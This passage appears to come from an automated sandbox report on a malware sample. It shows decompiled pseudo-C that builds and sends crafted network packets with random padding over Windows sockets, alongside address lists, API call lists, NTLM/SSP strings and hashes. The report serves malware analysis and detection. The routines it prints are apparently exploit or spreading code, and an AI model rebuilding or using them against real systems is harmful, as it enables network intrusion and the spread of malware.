                                                                                                                                                              								_t319 = _a24;
                                                                                                                                                              								__imp__#16(_a4, _t319, 0xffff, 0); // executed
                                                                                                                                                              								if(_t253 > 0) {
                                                                                                                                                              									if( *((intOrPtr*)(_t319 + 9)) == 0) {
                                                                                                                                                              										_v5 = 1;
                                                                                                                                                              									}
                                                                                                                                                              									memset(_t319, 0, 0xffff);
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							HeapFree(GetProcessHeap(), 8, _t264);
                                                                                                                                                              						}
                                                                                                                                                              						HeapFree(GetProcessHeap(), 8, _v20);
                                                                                                                                                              						_t322 = _v28;
                                                                                                                                                              					}
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v48);
                                                                                                                                                              				}
                                                                                                                                                              				HeapFree(GetProcessHeap(), 8, _v32);
                                                                                                                                                              				goto L49;
                                                                                                                                                              			}










































































                                                                                                                                                              0x04e2174d
                                                                                                                                                              0x04e21753
                                                                                                                                                              0x04e21757
                                                                                                                                                              0x04e2175a
                                                                                                                                                              0x04e2175a
                                                                                                                                                              0x04e2175d
                                                                                                                                                              0x04e21760
                                                                                                                                                              0x04e2176f
                                                                                                                                                              0x04e21772
                                                                                                                                                              0x04e21778
                                                                                                                                                              0x04e2177a
                                                                                                                                                              0x04e2178e
                                                                                                                                                              0x04e21790
                                                                                                                                                              0x04e21795
                                                                                                                                                              0x04e21c30
                                                                                                                                                              0x04e21c37
                                                                                                                                                              0x04e21c37
                                                                                                                                                              0x04e2179b
                                                                                                                                                              0x04e217a0
                                                                                                                                                              0x04e217a2
                                                                                                                                                              0x04e217a2
                                                                                                                                                              0x04e217a5
                                                                                                                                                              0x04e217a9
                                                                                                                                                              0x04e217ac
                                                                                                                                                              0x04e217b2
                                                                                                                                                              0x04e217b8
                                                                                                                                                              0x04e217bb
                                                                                                                                                              0x04e217be
                                                                                                                                                              0x04e217be
                                                                                                                                                              0x04e217c1
                                                                                                                                                              0x04e217c4
                                                                                                                                                              0x04e217d7
                                                                                                                                                              0x04e217df
                                                                                                                                                              0x04e217e1
                                                                                                                                                              0x04e217e6
                                                                                                                                                              0x04e21c22
                                                                                                                                                              0x04e21c2a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e21c2a
                                                                                                                                                              0x04e217ef
                                                                                                                                                              0x04e217f3
                                                                                                                                                              0x04e217f6
                                                                                                                                                              0x04e217ff
                                                                                                                                                              0x04e217ff
                                                                                                                                                              0x04e21801
                                                                                                                                                              0x04e21807
                                                                                                                                                              0x04e2180a
                                                                                                                                                              0x04e21815
                                                                                                                                                              0x04e21819
                                                                                                                                                              0x04e2181a
                                                                                                                                                              0x04e21823
                                                                                                                                                              0x04e21824
                                                                                                                                                              0x04e2182a
                                                                                                                                                              0x04e21830
                                                                                                                                                              0x04e21831
                                                                                                                                                              0x04e21835
                                                                                                                                                              0x04e21839
                                                                                                                                                              0x04e2183f
                                                                                                                                                              0x04e21846
                                                                                                                                                              0x04e2184b
                                                                                                                                                              0x04e2184e
                                                                                                                                                              0x04e21850
                                                                                                                                                              0x04e21852
                                                                                                                                                              0x04e21853
                                                                                                                                                              0x04e21855
                                                                                                                                                              0x04e21856
                                                                                                                                                              0x04e21856
                                                                                                                                                              0x04e21863
                                                                                                                                                              0x04e2186b
                                                                                                                                                              0x04e21c16
                                                                                                                                                              0x04e21c1c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e21c1c
                                                                                                                                                              0x04e21871
                                                                                                                                                              0x04e2187f
                                                                                                                                                              0x04e2188a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2189c
                                                                                                                                                              0x04e218a5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e218ad
                                                                                                                                                              0x04e218ae
                                                                                                                                                              0x04e218b5
                                                                                                                                                              0x04e218c1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e218ce
                                                                                                                                                              0x04e218d2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e218d4
                                                                                                                                                              0x04e218dd
                                                                                                                                                              0x04e218e8
                                                                                                                                                              0x04e218f2
                                                                                                                                                              0x04e218fd
                                                                                                                                                              0x04e218ff
                                                                                                                                                              0x04e21904
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2191f
                                                                                                                                                              0x04e21926
                                                                                                                                                              0x04e21c08
                                                                                                                                                              0x04e21c10
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e21c10
                                                                                                                                                              0x04e2192c
                                                                                                                                                              0x04e21941
                                                                                                                                                              0x04e21948
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e21955
                                                                                                                                                              0x04e2195b
                                                                                                                                                              0x04e2195d
                                                                                                                                                              0x04e21962
                                                                                                                                                              0x04e21bfa
                                                                                                                                                              0x04e21c02
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e21c02
                                                                                                                                                              0x04e2196b
                                                                                                                                                              0x04e21970
                                                                                                                                                              0x04e21973
                                                                                                                                                              0x04e21976
                                                                                                                                                              0x04e21979
                                                                                                                                                              0x04e2197c
                                                                                                                                                              0x04e21983
                                                                                                                                                              0x04e21983
                                                                                                                                                              0x04e2198c
                                                                                                                                                              0x04e2198f
                                                                                                                                                              0x04e2198f
                                                                                                                                                              0x04e21992
                                                                                                                                                              0x04e21992
                                                                                                                                                              0x04e219a7
                                                                                                                                                              0x04e219ae
                                                                                                                                                              0x04e219bb
                                                                                                                                                              0x04e219bd
                                                                                                                                                              0x04e219c2
                                                                                                                                                              0x04e219cb
                                                                                                                                                              0x04e219d0
                                                                                                                                                              0x04e219d1
                                                                                                                                                              0x04e219d2
                                                                                                                                                              0x04e219d3
                                                                                                                                                              0x04e219d6
                                                                                                                                                              0x04e219dc
                                                                                                                                                              0x04e219e5
                                                                                                                                                              0x04e219e7
                                                                                                                                                              0x04e219ed
                                                                                                                                                              0x04e219ed
                                                                                                                                                              0x04e219ff
                                                                                                                                                              0x04e21a08
                                                                                                                                                              0x04e21a0a
                                                                                                                                                              0x04e21a0a
                                                                                                                                                              0x04e21a16
                                                                                                                                                              0x04e21a1c
                                                                                                                                                              0x04e21a20
                                                                                                                                                              0x04e21a30
                                                                                                                                                              0x04e21a37
                                                                                                                                                              0x04e21a37
                                                                                                                                                              0x04e21a39
                                                                                                                                                              0x04e21a3f
                                                                                                                                                              0x04e21a42
                                                                                                                                                              0x04e21a4b
                                                                                                                                                              0x04e21a51
                                                                                                                                                              0x04e21a52
                                                                                                                                                              0x04e21a59
                                                                                                                                                              0x04e21a5f
                                                                                                                                                              0x04e21a63
                                                                                                                                                              0x04e21a67
                                                                                                                                                              0x04e21a6d
                                                                                                                                                              0x04e21a74
                                                                                                                                                              0x04e21a79
                                                                                                                                                              0x04e21a79
                                                                                                                                                              0x04e21a85
                                                                                                                                                              0x04e21a8c
                                                                                                                                                              0x04e21a8e
                                                                                                                                                              0x04e21a91
                                                                                                                                                              0x04e21a93
                                                                                                                                                              0x04e21a96
                                                                                                                                                              0x04e21a98
                                                                                                                                                              0x04e21a9d
                                                                                                                                                              0x04e21aa2
                                                                                                                                                              0x04e21aa9
                                                                                                                                                              0x04e21aad
                                                                                                                                                              0x04e21ab1
                                                                                                                                                              0x04e21ab5
                                                                                                                                                              0x04e21ab9
                                                                                                                                                              0x04e21ac0
                                                                                                                                                              0x04e21ac7
                                                                                                                                                              0x04e21ad1
                                                                                                                                                              0x04e21b10
                                                                                                                                                              0x04e21b11
                                                                                                                                                              0x04e21b16
                                                                                                                                                              0x04e21b19
                                                                                                                                                              0x04e21b1c
                                                                                                                                                              0x04e21b1f
                                                                                                                                                              0x04e21b20
                                                                                                                                                              0x04e21b23
                                                                                                                                                              0x04e21b26
                                                                                                                                                              0x04e21b29
                                                                                                                                                              0x04e21b2d
                                                                                                                                                              0x04e21ad3
                                                                                                                                                              0x04e21ad5
                                                                                                                                                              0x04e21ad6
                                                                                                                                                              0x04e21ada
                                                                                                                                                              0x04e21ae3
                                                                                                                                                              0x04e21aea
                                                                                                                                                              0x04e21aed
                                                                                                                                                              0x04e21aee
                                                                                                                                                              0x04e21af1
                                                                                                                                                              0x04e21af4
                                                                                                                                                              0x04e21af7
                                                                                                                                                              0x04e21afb
                                                                                                                                                              0x04e21aff
                                                                                                                                                              0x04e21b02
                                                                                                                                                              0x04e21b09
                                                                                                                                                              0x04e21b09
                                                                                                                                                              0x04e21b34
                                                                                                                                                              0x04e21b34
                                                                                                                                                              0x04e21b3d
                                                                                                                                                              0x04e21b48
                                                                                                                                                              0x04e21b4f
                                                                                                                                                              0x04e21b55
                                                                                                                                                              0x04e21b6e
                                                                                                                                                              0x04e21b6f
                                                                                                                                                              0x04e21b6f
                                                                                                                                                              0x04e21b57
                                                                                                                                                              0x04e21b57
                                                                                                                                                              0x04e21b5c
                                                                                                                                                              0x04e21b5e
                                                                                                                                                              0x04e21b61
                                                                                                                                                              0x04e21b61
                                                                                                                                                              0x04e21b7a
                                                                                                                                                              0x04e21b82
                                                                                                                                                              0x04e21b84
                                                                                                                                                              0x04e21b93
                                                                                                                                                              0x04e21b9b
                                                                                                                                                              0x04e21ba1
                                                                                                                                                              0x04e21ba3
                                                                                                                                                              0x04e21ba3
                                                                                                                                                              0x04e21bab
                                                                                                                                                              0x04e21bb0
                                                                                                                                                              0x04e21b9b
                                                                                                                                                              0x04e21bbd
                                                                                                                                                              0x04e21bbd
                                                                                                                                                              0x04e21bcf
                                                                                                                                                              0x04e21bdb
                                                                                                                                                              0x04e21bdb
                                                                                                                                                              0x04e21be6
                                                                                                                                                              0x04e21be6
                                                                                                                                                              0x04e21bf4
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,04E21C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 04E21783
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E2178C
                                                                                                                                                              • CharUpperW.USER32(00000000), ref: 04E217B2
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000086), ref: 04E217DA
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E217DD
                                                                                                                                                              • htons.WS2_32(00000082), ref: 04E21801
                                                                                                                                                              • send.WS2_32(00000086,?,00000086,00000041), ref: 04E21863
                                                                                                                                                              • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04E2187F
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000018), ref: 04E218F4
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E218FD
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000,?,00008003,00008003,?,?,00000000,?,00008002), ref: 04E21958
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E2195B
                                                                                                                                                              • rand.MSVCRT ref: 04E21983
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000018,?,00000010,?,?,00008003), ref: 04E219B8
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E219BB
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04E21A13
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04E21A16
                                                                                                                                                              • htons.WS2_32(-000000FC), ref: 04E21A39
                                                                                                                                                              • memcpy.MSVCRT ref: 04E21B48
                                                                                                                                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 04E21B7A
                                                                                                                                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04E21B93
                                                                                                                                                              • memset.MSVCRT ref: 04E21BAB
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04E21BB6
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E21BBD
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04E21BC8
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E21BCF
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04E21BE3
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E21BE6
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000010,?,?,00008003), ref: 04E21BF1
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E21BF4
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04E21BFF
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E21C02
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,00008002), ref: 04E21C0D
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E21C10
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04E21C19
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E21C1C
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04E21C27
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E21C2A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$Free$Alloc$htonsrecvsend$AllocateCharUppermemcpymemsetrand
                                                                                                                                                              • String ID: Oet Uet0Xet$NTLM$SSP
                                                                                                                                                              • API String ID: 1373760180-2728736143
                                                                                                                                                              • Opcode ID: c7934af5a1d3b40c9193c094feb5f1bfe856b8947277da243938bead112d523c
                                                                                                                                                              • Instruction ID: 55fd55f45560b358bdee66786d66de106b1ddf8245d95764a25c953403bf46c6
                                                                                                                                                              • Opcode Fuzzy Hash: c7934af5a1d3b40c9193c094feb5f1bfe856b8947277da243938bead112d523c
                                                                                                                                                              • Instruction Fuzzy Hash: C2F1CF75900306EFEB24DFA4CD85BAABBB4FF48304F0484A9EA44DB295E775E904CB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 111 4e22497-4e224bf GetProcessHeap HeapAlloc 112 4e224c5-4e224d6 GetProcessHeap HeapAlloc 111->112 113 4e226ff-4e22705 111->113 114 4e226ec-4e226fe HeapFree 112->114 115 4e224dc-4e2255d rand htons 112->115 114->113 116 4e2256f-4e2258a HeapAlloc 115->116 117 4e2255f-4e2256d rand 115->117 120 4e22590-4e225cb htons 116->120 121 4e226dc-4e226e6 HeapFree 116->121 117->116 117->117 122 4e225cd-4e225db rand 120->122 121->114 122->122 124 4e225dd-4e225f8 HeapAlloc 122->124 126 4e225fe-4e22634 memcpy * 2 send 124->126 127 4e226cc-4e226d6 HeapFree 124->127 128 4e226ba-4e226c6 HeapFree 126->128 129 4e2263a-4e22651 send 126->129 127->121 128->127 129->128 130 4e22653-4e22667 129->130 132 4e22694-4e2269b recv 130->132 134 4e22669-4e22677 132->134 135 4e2269d 132->135 134->128 136 4e22679-4e22680 134->136 135->128 136->128 137 4e22682-4e22688 136->137 138 4e2268a-4e22693 137->138 139 4e2269f-4e226a3 137->139 138->132 140 4e226b6 139->140 141 4e226a5-4e226b4 call 4e22344 139->141 140->128 141->128
                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E04E22497(void* __ecx, intOrPtr _a4, void** _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				void* _t65;
                                                                                                                                                              				signed int _t71;
                                                                                                                                                              				void* _t73;
                                                                                                                                                              				short _t75;
                                                                                                                                                              				void* _t84;
                                                                                                                                                              				void* _t95;
                                                                                                                                                              				void* _t100;
                                                                                                                                                              				void* _t101;
                                                                                                                                                              				void* _t105;
                                                                                                                                                              				signed int _t108;
                                                                                                                                                              				signed int _t109;
                                                                                                                                                              				intOrPtr _t111;
                                                                                                                                                              				signed int _t112;
                                                                                                                                                              				signed int _t115;
                                                                                                                                                              				void* _t120;
                                                                                                                                                              				void** _t124;
                                                                                                                                                              				void* _t128;
                                                                                                                                                              				void* _t131;
                                                                                                                                                              				void* _t137;
                                                                                                                                                              				void* _t139;
                                                                                                                                                              				void* _t140;
                                                                                                                                                              				intOrPtr* _t141;
                                                                                                                                                              				intOrPtr* _t142;
                                                                                                                                                              
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t65 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                              				_v12 = _t65;
                                                                                                                                                              				if(_t65 == 0) {
                                                                                                                                                              					L24:
                                                                                                                                                              					return _v5;
                                                                                                                                                              				}
                                                                                                                                                              				_t105 = HeapAlloc(GetProcessHeap(), 8, 0x1124);
                                                                                                                                                              				if(_t105 == 0) {
                                                                                                                                                              					L23:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                              					goto L24;
                                                                                                                                                              				}
                                                                                                                                                              				_t124 = _a8;
                                                                                                                                                              				_t71 = rand();
                                                                                                                                                              				_t108 = 0x14;
                                                                                                                                                              				asm("cdq");
                                                                                                                                                              				_t109 = 9;
                                                                                                                                                              				 *((intOrPtr*)( *_t124 + 0x22)) =  *((intOrPtr*)( *_t124 + 0x22)) + _t71 % _t108;
                                                                                                                                                              				_t73 = memcpy(_t105,  *_t124, _t109 << 2);
                                                                                                                                                              				__imp__#9(0x1120);
                                                                                                                                                              				 *(_t105 + 2) = _t73;
                                                                                                                                                              				_t111 = 4;
                                                                                                                                                              				 *((intOrPtr*)(_t105 + 0x40)) = 0x10d0;
                                                                                                                                                              				 *((intOrPtr*)(_t105 + 0x2c)) = 0x10d0;
                                                                                                                                                              				 *((intOrPtr*)(_t105 + 0x34)) = 0x10d0;
                                                                                                                                                              				_t75 = 5;
                                                                                                                                                              				 *((short*)(_t105 + 0x49)) = _t75;
                                                                                                                                                              				 *((short*)(_t105 + 0x4b)) =  *((intOrPtr*)(_t105 + 0x40)) + 7;
                                                                                                                                                              				 *((char*)(_t105 + 8)) = 0xa0;
                                                                                                                                                              				 *((char*)(_t105 + 0x24)) = 0x13;
                                                                                                                                                              				 *((intOrPtr*)(_t105 + 0x28)) = 0;
                                                                                                                                                              				 *((intOrPtr*)(_t105 + 0x30)) = 0x3f3c;
                                                                                                                                                              				 *((intOrPtr*)(_t105 + 0x38)) = _t111;
                                                                                                                                                              				 *((intOrPtr*)(_t105 + 0x3c)) = 0x4c;
                                                                                                                                                              				 *((intOrPtr*)(_t105 + 0x44)) = 0x50;
                                                                                                                                                              				_t137 = 0;
                                                                                                                                                              				 *((short*)(_t105 + 0x50)) = _a12;
                                                                                                                                                              				if( *((intOrPtr*)(_t105 + 0x40)) <= 0) {
                                                                                                                                                              					L4:
                                                                                                                                                              					_t128 = HeapAlloc(GetProcessHeap(), 8, 0x160);
                                                                                                                                                              					_a12 = _t128;
                                                                                                                                                              					if(_t128 == 0) {
                                                                                                                                                              						L22:
                                                                                                                                                              						HeapFree(GetProcessHeap(), 8, _t105);
                                                                                                                                                              						goto L23;
                                                                                                                                                              					}
                                                                                                                                                              					_t112 = 9;
                                                                                                                                                              					_t84 = memcpy(_t128,  *_a8, _t112 << 2);
                                                                                                                                                              					__imp__#9(0x15c);
                                                                                                                                                              					_t131 = _a12;
                                                                                                                                                              					 *(_t131 + 2) = _t84;
                                                                                                                                                              					 *((intOrPtr*)(_t131 + 0x2c)) = 0x114;
                                                                                                                                                              					 *((intOrPtr*)(_t131 + 0x3c)) = 0x114;
                                                                                                                                                              					 *((char*)(_t131 + 8)) = 0xa1;
                                                                                                                                                              					 *((char*)(_t131 + 0x24)) = 0x12;
                                                                                                                                                              					 *((intOrPtr*)(_t131 + 0x40)) = 0x48;
                                                                                                                                                              					 *((short*)(_t131 + 0x49)) = 0x115;
                                                                                                                                                              					_t139 = 0;
                                                                                                                                                              					do {
                                                                                                                                                              						 *((char*)(_t131 + _t139 + 0x4c)) = rand();
                                                                                                                                                              						_t139 = _t139 + 1;
                                                                                                                                                              					} while (_t139 <  *((intOrPtr*)(_t131 + 0x3c)));
                                                                                                                                                              					_t140 = HeapAlloc(GetProcessHeap(), 8, 0x1284);
                                                                                                                                                              					_a8 = _t140;
                                                                                                                                                              					if(_t140 == 0) {
                                                                                                                                                              						L21:
                                                                                                                                                              						HeapFree(GetProcessHeap(), 8, _t131);
                                                                                                                                                              						goto L22;
                                                                                                                                                              					}
                                                                                                                                                              					memcpy(_t140, _t105, 0x1124);
                                                                                                                                                              					_t46 = _t140 + 0x1124; // 0x1124
                                                                                                                                                              					memcpy(_t46, _t131, 0x160);
                                                                                                                                                              					_t141 = __imp__#19; // executed
                                                                                                                                                              					_t95 =  *_t141(_a4, _t140, 0x111c, 0); // executed
                                                                                                                                                              					if(_t95 <= 0) {
                                                                                                                                                              						L20:
                                                                                                                                                              						HeapFree(GetProcessHeap(), 8, _a8);
                                                                                                                                                              						goto L21;
                                                                                                                                                              					}
                                                                                                                                                              					_t100 =  *_t141(_a4, _a8 + 0x111c, 0x168, 0); // executed
                                                                                                                                                              					if(_t100 <= 0) {
                                                                                                                                                              						goto L20;
                                                                                                                                                              					}
                                                                                                                                                              					_a12 = _a12 & 0x00000000;
                                                                                                                                                              					_t142 = __imp__#16;
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_push(0xffff);
                                                                                                                                                              					_push(_v12);
                                                                                                                                                              					while(1) {
                                                                                                                                                              						_t101 =  *_t142(_a4); // executed
                                                                                                                                                              						if(_t101 <= 0) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						_t115 = _a12 + _t101;
                                                                                                                                                              						_a12 = _t115;
                                                                                                                                                              						if(_t115 == 0x1193) {
                                                                                                                                                              							goto L20;
                                                                                                                                                              						}
                                                                                                                                                              						_t120 = _v12;
                                                                                                                                                              						if( *((intOrPtr*)(_t120 + 9)) != 0) {
                                                                                                                                                              							goto L20;
                                                                                                                                                              						}
                                                                                                                                                              						if(_t115 >= 0x1280) {
                                                                                                                                                              							if(_t101 < 0x1c) {
                                                                                                                                                              								_v5 = 0;
                                                                                                                                                              							} else {
                                                                                                                                                              								_v5 = E04E22344(_t101, _t115 - _t101 + _t120, _a16);
                                                                                                                                                              							}
                                                                                                                                                              							goto L20;
                                                                                                                                                              						}
                                                                                                                                                              						_push(0);
                                                                                                                                                              						_push(0xffff);
                                                                                                                                                              						_push(_t120 + _t115);
                                                                                                                                                              					}
                                                                                                                                                              					goto L20;
                                                                                                                                                              				} else {
                                                                                                                                                              					goto L3;
                                                                                                                                                              				}
                                                                                                                                                              				do {
                                                                                                                                                              					L3:
                                                                                                                                                              					 *((char*)(_t105 + _t137 + 0x54)) = rand();
                                                                                                                                                              					_t137 = _t137 + 1;
                                                                                                                                                              				} while (_t137 <  *((intOrPtr*)(_t105 + 0x40)));
                                                                                                                                                              				goto L4;
                                                                                                                                                              			}





























                                                                                                                                                              0x04e2249a
                                                                                                                                                              0x04e2249b
                                                                                                                                                              0x04e224ab
                                                                                                                                                              0x04e224b8
                                                                                                                                                              0x04e224ba
                                                                                                                                                              0x04e224bf
                                                                                                                                                              0x04e226ff
                                                                                                                                                              0x04e22705
                                                                                                                                                              0x04e22705
                                                                                                                                                              0x04e224d2
                                                                                                                                                              0x04e224d6
                                                                                                                                                              0x04e226ec
                                                                                                                                                              0x04e226f8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e226fe
                                                                                                                                                              0x04e224dc
                                                                                                                                                              0x04e224e1
                                                                                                                                                              0x04e224e9
                                                                                                                                                              0x04e224ea
                                                                                                                                                              0x04e224ef
                                                                                                                                                              0x04e224f5
                                                                                                                                                              0x04e224fd
                                                                                                                                                              0x04e224ff
                                                                                                                                                              0x04e22505
                                                                                                                                                              0x04e2250b
                                                                                                                                                              0x04e22511
                                                                                                                                                              0x04e22514
                                                                                                                                                              0x04e22517
                                                                                                                                                              0x04e2251c
                                                                                                                                                              0x04e2251d
                                                                                                                                                              0x04e22529
                                                                                                                                                              0x04e22531
                                                                                                                                                              0x04e22535
                                                                                                                                                              0x04e22539
                                                                                                                                                              0x04e2253c
                                                                                                                                                              0x04e22543
                                                                                                                                                              0x04e22546
                                                                                                                                                              0x04e2254d
                                                                                                                                                              0x04e22554
                                                                                                                                                              0x04e22556
                                                                                                                                                              0x04e2255d
                                                                                                                                                              0x04e2256f
                                                                                                                                                              0x04e22583
                                                                                                                                                              0x04e22585
                                                                                                                                                              0x04e2258a
                                                                                                                                                              0x04e226dc
                                                                                                                                                              0x04e226e6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e226e6
                                                                                                                                                              0x04e22597
                                                                                                                                                              0x04e2259d
                                                                                                                                                              0x04e2259f
                                                                                                                                                              0x04e225a5
                                                                                                                                                              0x04e225a8
                                                                                                                                                              0x04e225b1
                                                                                                                                                              0x04e225b4
                                                                                                                                                              0x04e225b8
                                                                                                                                                              0x04e225bc
                                                                                                                                                              0x04e225c0
                                                                                                                                                              0x04e225c7
                                                                                                                                                              0x04e225cb
                                                                                                                                                              0x04e225cd
                                                                                                                                                              0x04e225d3
                                                                                                                                                              0x04e225d7
                                                                                                                                                              0x04e225d8
                                                                                                                                                              0x04e225f1
                                                                                                                                                              0x04e225f3
                                                                                                                                                              0x04e225f8
                                                                                                                                                              0x04e226cc
                                                                                                                                                              0x04e226d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e226d6
                                                                                                                                                              0x04e22605
                                                                                                                                                              0x04e2260f
                                                                                                                                                              0x04e22617
                                                                                                                                                              0x04e2262a
                                                                                                                                                              0x04e22630
                                                                                                                                                              0x04e22634
                                                                                                                                                              0x04e226ba
                                                                                                                                                              0x04e226c6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e226c6
                                                                                                                                                              0x04e2264d
                                                                                                                                                              0x04e22651
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22653
                                                                                                                                                              0x04e22657
                                                                                                                                                              0x04e2265d
                                                                                                                                                              0x04e2265f
                                                                                                                                                              0x04e22664
                                                                                                                                                              0x04e22694
                                                                                                                                                              0x04e22697
                                                                                                                                                              0x04e2269b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2266c
                                                                                                                                                              0x04e2266e
                                                                                                                                                              0x04e22677
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22679
                                                                                                                                                              0x04e22680
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22688
                                                                                                                                                              0x04e226a3
                                                                                                                                                              0x04e226b6
                                                                                                                                                              0x04e226a5
                                                                                                                                                              0x04e226b1
                                                                                                                                                              0x04e226b1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e226a3
                                                                                                                                                              0x04e2268a
                                                                                                                                                              0x04e2268c
                                                                                                                                                              0x04e22693
                                                                                                                                                              0x04e22693
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2255f
                                                                                                                                                              0x04e2255f
                                                                                                                                                              0x04e22565
                                                                                                                                                              0x04e22569
                                                                                                                                                              0x04e2256a
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,04E2471C,?,?,?,?,?), ref: 04E224AF
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E2471C,?,?,?,?,?), ref: 04E224B8
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00001124,74654F20,?,?,?,04E2471C,?,?,?,?,?), ref: 04E224CD
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E2471C,?,?,?,?,?), ref: 04E224D0
                                                                                                                                                              • rand.MSVCRT ref: 04E224E1
                                                                                                                                                              • htons.WS2_32(00001120), ref: 04E224FF
                                                                                                                                                              • rand.MSVCRT ref: 04E2255F
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,04E2471C,?,?,?,?,?), ref: 04E22576
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E2471C,?,?,?,?,?), ref: 04E2257D
                                                                                                                                                              • htons.WS2_32(0000015C), ref: 04E2259F
                                                                                                                                                              • rand.MSVCRT ref: 04E225CD
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00001284,?,?,?,04E2471C,?,?,?,?,?), ref: 04E225E4
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E2471C,?,?,?,?,?), ref: 04E225EB
